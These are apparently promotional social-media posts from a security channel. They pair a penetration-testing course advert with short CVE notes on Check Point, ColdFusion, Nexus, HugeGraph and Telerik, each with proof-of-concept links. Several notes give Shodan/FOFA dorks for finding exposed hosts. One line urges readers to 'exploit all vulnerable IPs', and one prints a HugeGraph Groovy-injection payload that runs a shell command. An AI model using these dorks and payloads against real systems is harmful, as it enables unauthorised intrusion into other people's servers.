Advance Your Career in Cybersecurity with Our Comprehensive VAPT Course!
Are you ready to become a cybersecurity expert? Enroll in our Vulnerability Assessment and Penetration Testing (VAPT) course and gain the skills you need to protect critical systems and data.
Key Features:
- Live Trainer-Led Online Training: Engage in interactive sessions led by experienced cybersecurity professionals.
- 50 Hours of Classes Over 3 Months: Comprehensive coverage of VAPT topics, allowing for in-depth learning and mastery.
- 70% Practical Oriented: Emphasis on hands-on labs and real-world scenarios to ensure you can apply what you learn.
- Pay in 2 Installments: Flexible payment options to suit your financial needs.
- Career Oriented Training: Focused on building the skills needed for a successful career in cybersecurity.
- 2 Practical Assignments & 1 Capture The Flag (CTF) Exam: Practical assessments to test and enhance your skills.
Register Now: https://wa.me/message/NQLPOBIAEFDBN1
Exploit all vulnerable IPs: CVE-2024-24919
https://github.com/seed1337/CVE-2024-24919-POC
Go Dork - The Fastest Dork Scanner
Searching for relevant things on the Internet is always challenging work. Sometimes we don't get desired results for our query or question. So to solve this problem, there is a concept of Dorking.
GitHub: https://github.com/dwisiswant0/go-dork
Check Point Quantum Gateway - CVE-2024-24919
CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
GitHub POC: https://github.com/seed1337/CVE-2024-24919-POC
Adobe ColdFusion XSS - CVE-2023-44352
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
PoC: https://buff.ly/3V2F8tD
Brut Security
Check Point Quantum Gateway - CVE-2024-24919: CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN…
"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
CVE-2024-4956: Nexus Repository Flaw Exposed
This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.
Dorks:
Hunter: /product.name="Nexus Repository"
FOFA: app="Nexus-Repository-Manager"
SHODAN: http.html:"Nexus Repository"
POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.
POC: https://lnkd.in/g_v4h7Cg
Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"
Use these extensions; they will help you extract all domains from any website.
- Link Extractor: https://link-extractor.cssnr.com
- Link Gopher: https://github.com/az0/linkgopher
CVE-2024-27348: RCE in Apache HugeGraph-Server.
Remedy: Upgrade to version 1.3.0 to mitigate.
Payload:
{"gremlin":"def result = \"uname -a\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(\"BrutSecurity\"+ result);"
}
Video: https://youtu.be/32cyeCd4DEc
YouTube
CVE-2024-27348 | RCE in Apache HugeGraph-Server | Bug Bounty POC | Brut Security
CVE-2024-27348: RCE in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11. Users are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.
Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)
PoC: https://github.com/sinsinology/CVE-2024-4358
Detailed Analysis from @SinSinology: https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
Dorks:
- Hunter: /product.name="Telerik report server"
- FOFA: app="Telerik-Report-Server"
- SHODAN: http.title:"Telerik report server"
Hello Members, Hope you're doing well. We have created a WhatsApp Channel for Brut Security. Join now, more cyber security insights coming soon!
You can join here: https://whatsapp.com/channel/0029VacUEmpCnA8014ZLnm1L
Android SSL Pinning Bypass using Noxer
Automate your Android penetration testing lab setup using Nox Emulator. Noxer is a powerful Python script designed for automating Android penetration testing tasks within the Nox Player emulator. It simplifies setup, enhances stability, manages Frida Server, removes unwanted bloatware, integrates BurpSuite certificates, and much more!
Noxer: https://buff.ly/4b0gxM4